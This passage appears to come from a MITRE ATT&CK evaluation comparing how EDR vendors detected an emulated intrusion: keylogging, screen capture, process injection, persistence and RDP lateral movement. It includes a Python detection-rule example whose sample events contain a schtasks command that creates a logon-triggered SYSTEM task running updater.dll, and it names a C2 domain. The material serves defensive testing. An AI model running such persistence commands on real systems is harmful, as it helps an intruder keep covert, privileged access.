OverWatch generated a General Behavior alert indicating tree.com was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was identified because tree was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry
Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Enrichment (Tainted)
The capability enriched cmd.exe executing tree with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched tree with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery). The enrichment was also tainted by a parent Malicious File Detection. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry within an event tree (tainted by a parent Malicious File Detection) showed cmd.exe executing tree with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched cmd.exe executing tree with an alert for Tree Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery). [1] [2] [3] [4]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker performed a directory listing of the contents of Debbie's user profile directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running tree) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing tree) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched cmd.exe executing the tree command with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
Telemetry (Tainted)
Telemetry showed that svchost.exe created cmd.exe, which executed tree with command-line arguments. The telemetry was tainted by the parent "Powershell process created" alert. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing tree.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Enrichment
The capability enriched cmd.exe executing tree.exe with the correct ATT&CK Tactic (Discovery) and Technique (File and Directory Discovery). [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for cmd.exe executing tree.com with command-line arguments. The telemetry was tainted by a prior alert on rundll32.exe being executed without command-line arguments. [1] [2] [3] [4] [5]
Palo Alto Networks
Enrichment
The capability enriched cmd.exe executing tree with command-line arguments with the correct ATT&CK Technique (File and Directory Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
Telemetry
Telemetry showed cmd.exe executing tree with command-line arguments. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry was tainted by the activity seen during the initial compromise step because it was associated with the same story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
None
No detection capability demonstrated for this procedure. The vendor indicated that CB Defense sees applicable API calls, but that product was not included in the evaluation. [1] [2]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect input capture specifically). [1] [2] [3] [4]
Cybereason
None
No detection capability was available, though an alert was generated based on a chain of injections caused by process injection of powershell.exe to cmd.exe then explorer.exe. Data within the alert showed the loaded keyloggerx64.dll module, and additional data showed the memory address and size of the module within explorer.exe. [1] [2] [3] [4] [5] [6]
Endgame
None
No detection capability demonstrated for this procedure, though strings were pulled from a Process Injection alert, which identified functionality of code to indicate keylogging, but no proof of execution was identified. [1] [2] [3]
FireEye
None
No detection capability demonstrated for this procedure. [1]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed a remote thread being created from cmd.exe in explorer.exe. The vendor noted that if a user determined the process creation was suspicious, the user could manually kick off a DDNA scan from the Command-Line Interface (CLI) view by using the Process ID (PID). [1] [2] [3]
McAfee
None
No detection capability demonstrated for this procedure, though an alert indicated cmd.exe obtained a handle to the memory thread and injected code into explorer.exe. [1]
Microsoft
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated on "Possible keylogging activity" against explorer.exe. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Configuration Change)
Telemetry showed events indicating "explorer.exe is reading user keystrokes." The vendor stated that Input Capture telemetry is captured but it was not immediately visible in the user portal. The vendor made changes to the portal during the test to enable the visibility of these events. Telemetry also showed cmd.exe injecting into explorer.exe to facilitate the keylogging, but this did not identify input capture specifically so was not counted as a detection. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched the execution of a specific API call as keylogging and suspicious activity. Though it does not count as a detection, the capability also showed code and hook injections into explorer.exe. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure, though a floating code "IIOC" module alerted with an elevated risk score for DLL injection. An analyst could explore the module and observe the keylogger aggressor script, but this only showed that there is a potential capability of a keylogger, not that execution occurred. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed GetAsyncKeyStateApi, which was indicative of keylogging. The telemetry was tainted by the activity seen during the initial compromise step because it was associated with the same story (Group ID). Vendor stated log files indicate the powershell process was using the SSL cache folder. [1] [2] [3]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure. [1]
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
None
No detection capability demonstrated for this procedure. [1]
GoSecure
None
No detection capability demonstrated for this procedure.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
None
No detection capability demonstrated for this procedure. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure, though modloads showed the thumbnail COM object masquerading followed by a modload of dwmapi.dll (Microsoft Desktop Windows Manager API) and then a crossprocess (open process) event to the target application, which could be indicative of screen capture behavior. [1]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect screen capture specifically). [1]
Cybereason
None
No detection capability was available, though an alert was generated based on explorer.exe being flagged for loading a Meterpreter Agent. Data within a previous process injection alert showed the loaded screenshotx64.dll module. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure, though strings were pulled from a Process Injection alert, which identified functionality of code to indicate screen capture, but no proof of execution was identified. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
None
No detection capability demonstrated for this procedure.
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed a remote thread being created from cmd.exe into explorer.exe. The vendor also noted that if a user determined the process creation was suspicious, the user could manually kick off a DDNA scan. DDNA results on this process reported "This module may capture screen shots," indicating the module has the capability to perform this. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
Enrichment (Configuration Change)
The capability enriched an explorer.exe process with ScreenshotTaken. The vendor stated that screen capture telemetry is captured but it was not immediately visible in the portal. The vendor made changes to the portal during the test to enable by default the visibility of these events, so this detection is identified as a configuration change. [1]
Palo Alto Networks
Enrichment
The capability enriched the execution of a specific API call as information gathering using screen capture and suspicious activity. [1]
RSA
None
No detection capability demonstrated for this procedure, though a floating code "IIOC" module alerted with an elevated risk score for DLL injection. An analyst could explore the module and observe multiple components related to jpegs, which may be related to screenshots, but this does not show that execution occurred. [1]
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Telemetry
Telemetry showed a cross-process "open handle" event into explorer.exe, which could be indicative of process injection. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Telemetry
Telemetry showed InjectedThread events for explorer.exe (pid=21776848613) injecting from cmd.exe (pid=21898821890), which is a known beacon. [1] [2] [3] [4] [5]
Cybereason
Specific Behavior
A Specific Behavior alert was generated based on a malicious code injection caused by process injection of explorer.exe. The alert was mapped with the correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection) and indicated that explorer.exe was hosting injected threads and loading malicious files. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert for process injection was generated with cmd.exe as the source. The alert was tainted by parent Malicious File Detection and process injection alerts, and was also labeled with the correct ATT&CK Technique (T1055 - Process Injection) and Tactics (Defense Evasion and Execution). [1] [2] [3] [4] [5]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2]
GoSecure
Telemetry
Telemetry showed a remote thread being created from cmd.exe into explorer.exe, which could be indicative of process injection. [1] [2] [3] [4] [5] [6] [7] [8]
McAfee
Specific Behavior (Tainted)
A Specific Behavior alert was generated for code injection into explorer.exe. The alert was tagged with the correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection) and was tainted by a trace detection on cmd.exe. [1] [2] [3]
Microsoft
Enrichment
The capability enriched the execution sequence for cmd.exe injecting into explorer.exe with the label "Inject to process." [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Palo Alto Networks
Enrichment
The capability enriched cmd.exe injecting into explorer.exe as code injection via CreateThread. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure, though a floating code "IIOC" module alerted with an elevated risk score for DLL injection. There was no telemetry available for the processes that were injected to verify its relation to this procedure. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed the sequence of events related to process injection from powershell.exe into explorer.exe. The capability associated the process with the highest threat to the event (powershell.exe) instead of cmd.exe (the expected source of the injection) because it had an alert associated with it previously. The telemetry was tainted by the activity seen during the initial compromise step because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure, though telemetry showed connection between Nimda (10.0.1.6) and the source of the file, Conficker (10.0.0.5), over port 445. [1]
Endgame
None
No detection capability demonstrated for this procedure, though file creation telemetry showed that the .vsdx file was created (no indication it was created from a shared drive). [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
None
No detection capability demonstrated for this procedure. [1]
GoSecure
None
No detection capability demonstrated for this procedure. [1]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure. The vendor stated that by default WDATP monitored activities around all the most used documents (doc, xls, ppt, pdf, etc.) at the time of the evaluation. Subsequently, the vendor made changes to enable the visibility of .vsdx events by default, which is now available in WDATP. [1]
Palo Alto Networks
Telemetry
Telemetry showed a file read event for the .vsdx file from the network shared drive. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry
Telemetry showed remote file access behavior for the .vsdx file from the network shared drive. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure, though telemetry showed connection between Nimda (10.0.1.6) and the source of the file, Conficker (10.0.0.5), over port 445. [1]
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
None
No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed. [1]
F-Secure
None
No detection capability demonstrated for this procedure.
GoSecure
None
No detection capability demonstrated for this procedure.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
None
No detection capability demonstrated for this procedure, though port 53 network traffic to/from freegoogleadsenseinfo.com (C2 domain) was observed. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3]
CrowdStrike
Telemetry
Telemetry showed cmd.exe running autoupdate.bat from the Startup folder. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed rundll32.exe executing autoupdate.bat from the Startup folder. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry showed the process chain for rundll32.exe execution of update.dat. The telemetry was tainted by the parent alert for "RunDLL32 with Suspicious DLL Location." [1] [2] [3]
FireEye
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that autoupdate.bat persisted due to its presence in the startup directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed rundll32.exe executing update.dll with command-line arguments. The telemetry was tainted by the parent alert for Rundll32 Execution (Weak Signal). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched cmd.exe executing a file from Startup with an alert for Process Execution Startup. The alert was also tagged with the correct ATT&CK Technique (T1060 - Registry Run Keys / Startup Folder) and Tactic (Persistence). [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for a batch file automatically being started from the Startup folder. [1] [2] [3]
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3]
GoSecure
Telemetry
Telemetry showed cmd.exe starting rundll32.exe, which started update.dat, as well as cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3]
McAfee
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder, then update.dat via rundll32.exe. [1] [2]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe executing autoupdate.bat from the Startup folder to start update.dat. [1] [2]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3]
RSA
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2]
SentinelOne
Telemetry
Telemetry showed execution of autoupdate.bat from the Startup folder for persistence. The telemetry was associated with a new story (Group ID) but was not marked as malicious or tainted because it is not associated with an alert. [1] [2] [3]
Carbon Black
Telemetry
Telemetry within the process tree showed rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule". [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed rundll32.exe starting updater.dll. The telemetry was tainted by the parent OverWatch alert. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed rundll32.exe executing update.dat with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed rundll32.exe executing updater.dll. The telemetry was tainted by a Malicious File Detection alert for updater.dll and a Process Injection alert. [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the Resume Viewer Update Checker scheduled task executing updater.dll with rundll32.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed svchost.exe executing rundll32.exe, which executed updater.dll. The telemetry was tainted by the parent Rundll32 Execution alert, which was tagged with a related ATT&CK Technique (T1085 - Rundll32) and Tactic (Defense Evasion, Execution), but did not include information on the use of a Scheduled Task specifically. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed rundll32.exe executing updater.dll. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed svchost.exe executing rundll32.exe, which executed updater.dll. The telemetry was tainted by the parent "Sponsor process started V2" alert. [1] [2]
McAfee
Telemetry
Telemetry showed rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule". [1] [2] [3]
Microsoft
Telemetry
Telemetry showed the execution sequence for rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule". [1] [2] [3]
Palo Alto Networks
Telemetry
Telemetry showed the execution sequence for rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule". [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed rundll32.exe executing updater.dll. [1] [2]
SentinelOne
Telemetry
Telemetry showed rundll32.exe executing updater.dll as part of the scheduled task persistence. The telemetry was associated with the execution of autoupdate.bat for persistence because it was associated with the same story (Group ID), but it was not marked as malicious or tainted because it is not associated with an alert. [1] [2] [3]
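The three lineage patterns the vendor entries above keep returning to (schtasks.exe /create spawned from cmd.exe with a SYSTEM run level and logon trigger; cmd.exe running autoupdate.bat out of the Startup folder; and rundll32.exe loading updater.dll under the Task Scheduler service host svchost.exe -k netsvcs -p -s Schedule) can be expressed as process-creation detection rules. The code below is an added example, not MITRE's or any vendor's code; the event records, command lines, PIDs, the updater.dll export name and the user path are constructed, and the ATT&CK IDs are T1053 for Scheduled Task and T1060 (the ID this page uses) for Startup Folder.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 style). Constructed for this example."""
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    technique: str
    tactic: str
    pid: int
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_schtasks_create(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """schtasks.exe /create spawned by cmd.exe (the 'Schtasks with create command' pattern).
    A SYSTEM run level and an onlogon trigger are reported as escalating context."""
    low = ev.cmdline.lower()
    if _basename(ev.image) != "schtasks.exe" or "/create" not in low:
        return None
    if parent is None or _basename(parent.image) != "cmd.exe":
        return None
    context = []
    if re.search(r'/ru\s+"?(?:nt authority\\)?system"?', low):
        context.append("runs as SYSTEM")
    if re.search(r"/sc\s+onlogon", low):
        context.append("triggers at logon")
    m = re.search(r'/tn\s+"([^"]+)"', ev.cmdline)
    name = m.group(1) if m else "<unparsed>"
    return Finding("schtasks_create", "T1053", "Persistence", ev.pid,
                   f"task {name!r} created from cmd.exe; " + (", ".join(context) or "no escalating flags"))


def rule_schedule_service_rundll32(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """rundll32.exe whose parent is the Task Scheduler service host, i.e. a task firing."""
    if _basename(ev.image) != "rundll32.exe" or parent is None:
        return None
    if _basename(parent.image) != "svchost.exe" or not re.search(r"-s\s+schedule\b", parent.cmdline.lower()):
        return None
    return Finding("schedule_service_rundll32", "T1053", "Execution", ev.pid,
                   f"Task Scheduler host launched rundll32.exe: {ev.cmdline}")


# Matches a script or binary path inside a per-user or all-users Startup folder.
STARTUP_ITEM = re.compile(r'\\start menu\\programs\\startup\\[^\s"]+\.(?:bat|cmd|vbs|lnk|exe)', re.I)


def rule_startup_folder(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """cmd.exe executing a file from the Startup folder (the autoupdate.bat case)."""
    if _basename(ev.image) != "cmd.exe":
        return None
    m = STARTUP_ITEM.search(ev.cmdline)
    if not m:
        return None
    return Finding("startup_folder_exec", "T1060", "Persistence", ev.pid,
                   f"Startup item executed: {m.group(0)}")


RULES = [rule_schtasks_create, rule_schedule_service_rundll32, rule_startup_folder]


def evaluate(events: List[ProcEvent]) -> List[Finding]:
    """Resolve each event's parent by PID and run every rule over it."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Finding] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        for rule in RULES:
            f = rule(ev, parent)
            if f is not None:
                findings.append(f)
    return findings


# Constructed sample: two benign events mixed with the three persistence-chain events.
SAMPLE_EVENTS = [
    ProcEvent(4000, 3000, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4100, 4000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(4101, 4100, r"C:\Windows\System32\schtasks.exe",
              'schtasks.exe /create /tn "Resume Viewer Update Checker" '
              r'/tr "rundll32.exe C:\Users\Public\updater.dll,Start" /sc onlogon /ru SYSTEM'),
    ProcEvent(4102, 4100, r"C:\Windows\System32\schtasks.exe",
              'schtasks.exe /query /tn "Resume Viewer Update Checker"'),  # query, must not fire
    ProcEvent(900, 600, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p -s Schedule"),
    ProcEvent(4200, 900, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\Public\updater.dll,Start"),
    ProcEvent(4300, 4000, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoupdate.bat"'),
    ProcEvent(4400, 4000, r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),  # benign
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"[{f.technique} {f.tactic}] pid={f.pid} {f.rule}: {f.detail}")
```

Note that the rundll32 rule keys on the Task Scheduler host's "-s Schedule" argument rather than on the DLL name, which is what lets the svchost.exe -> rundll32.exe -> updater.dll telemetry above be attributed to a scheduled task even when the task name is not in the event.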
Carbon Black
Enrichment
The capability enriched rdpclip.exe with the correct ATT&CK Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry
Telemetry within the process tree showed rdpclip.exe execution by the user Jesse on the destination system of the RDP connection. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry
Telemetry showed a type 10 (interactive) UserLogon event for Jesse. [1] [2] [3] [4]
Cybereason
Telemetry
Telemetry showed the logon session for Jesse to Conficker (10.0.0.5) as a Remote Interactive Logon Type. [1] [2] [3]
Endgame
Telemetry (Tainted)
Telemetry showed that the userinit.exe process was running as the user Jesse, indicating Jesse logged in. The telemetry was tainted by the parent "Start Folder Persistence" alert. [1] [2] [3] [4] [5]
FireEye
Telemetry
Telemetry showed a Logon Type 10 (interactive) event for the account Jesse logging on to Conficker. [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the account Jesse was used to log in to Conficker as part of Lateral Movement. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a remote interactive logon event for the account Jesse logging on to Conficker (10.0.0.5) over port 3389. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry
Telemetry showed that the explorer.exe process was running as the user Jesse, indicating the account exists. [1] [2] [3] [4]
McAfee
Telemetry
Telemetry showed a remote interactive logon for Jesse to Conficker (10.0.0.5). [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed the new local user account Jesse logging into Conficker. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry
Telemetry showed userinit.exe as well as explorer.exe spawn as the user Jesse. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed "unregmp2.exe /FirstLogon" (associated with user logon) as well as the user name "Jesse J" within Machine Properties. [1] [2] [3] [4]
SentinelOne
Telemetry
Telemetry showed the Jesse account had logged into the system. [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry within the process tree showed rdpclip.exe execution by the user Jesse on the destination system of the RDP connection. [1] [2] [3] [4] [5]
Enrichment
The capability enriched rdpclip.exe with the correct ATT&CK Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
CrowdStrike
Telemetry
Telemetry showed the remote connection to Conficker for a user logon by Jesse with type 10 (interactive) as well as the use of rdpclip.exe by the logged-on user. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior occurred because they observed suspicious communications over 3389 (RDP) to other hosts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Telemetry (Tainted)
Telemetry showed the logon session for Jesse to Conficker (10.0.0.5) as a Remote Interactive Logon Type. Telemetry also showed a connection over port 3389 to Conficker (10.0.0.5) through rundll32.exe serving as a proxy. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed a Type 10 logon event (corresponding to interactive) for Jesse as well as remote connections over port 3389 to 10.0.0.5 (Conficker). [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the user account Jesse logged on to Conficker via Remote Desktop Protocol. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched a TCP port 3389 connection to 10.0.0.5 (Conficker) with the alert RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed a Logon Type 10 (interactive) event for the account Jesse logging on to Conficker. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a remote interactive logon event for the account Jesse logging on to Conficker (10.0.0.5) over port 3389. [1] [2] [3]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability enriched a TCP port 3389 (RDP) connection to 10.0.0.5 (Conficker) with the conditions Lateral Movement and Remote Share Access. One connection event was tainted by the parent "Windows command prompt invoked" alert. The conditions contributing to Enrichment were added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4]
McAfee
Enrichment
The capability enriched the rundll32.exe that made the network connection with the correct ATT&CK Tactic (Lateral Movement) and Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed a remote interactive logon for Jesse to Conficker (10.0.0.5) as well as a connection to 10.0.0.5 (Conficker) over port 3389 from rundll32.exe. The telemetry was tainted by a trace detection on rundll32.exe. [1] [2] [3] [4] [5]
Microsoft
Telemetry
Telemetry showed a successful connection to Conficker (10.0.0.5) over port 3389 from rundll32.exe. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched the network connection over port 3389 with the correct ATT&CK Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry
Telemetry showed a successful incoming connection to Conficker (10.0.0.5) over port 3389. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure. [1]
SentinelOne
Telemetry (Tainted)
